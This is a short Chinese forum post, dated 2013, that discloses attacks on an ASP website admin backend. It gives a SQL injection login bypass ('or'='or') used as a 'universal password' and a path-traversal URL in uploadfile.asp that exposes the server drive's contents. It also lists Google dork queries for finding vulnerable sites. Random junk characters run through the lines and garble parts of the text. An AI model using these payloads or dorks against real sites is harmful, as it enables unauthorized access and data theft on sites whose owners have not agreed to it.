后台万能密码 'or'='or'
, d$ _6 U$ y) i3 m8 ~$ E% G7 A( @6 r' Y, t0 B8 u! s
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
8 k R5 T+ ]/ ]8 Kadmin/uploadfile.asp?currentFolder=/upfiles/../# ?2 H& q3 x1 V+ X0 R- ~, \
2 W' ^- p+ V+ ~& M0 m% ]
漏洞证明:2 H; c- E6 p) Q4 n2 }
" _( J3 d; _7 [% e+ a: t+ K( w谷歌:inurl:type.asp?id=1 新闻中心
4 `0 z6 h# {) Q, I3 v或者 :inurl:download_ok.asp?
) s- D: Q( }6 o+ y/ ^. i0 q3 u4 @- }, M7 k$ t, V$ ^6 E
|
发表于 2013-3-14 20:17:32
收藏
支持
反对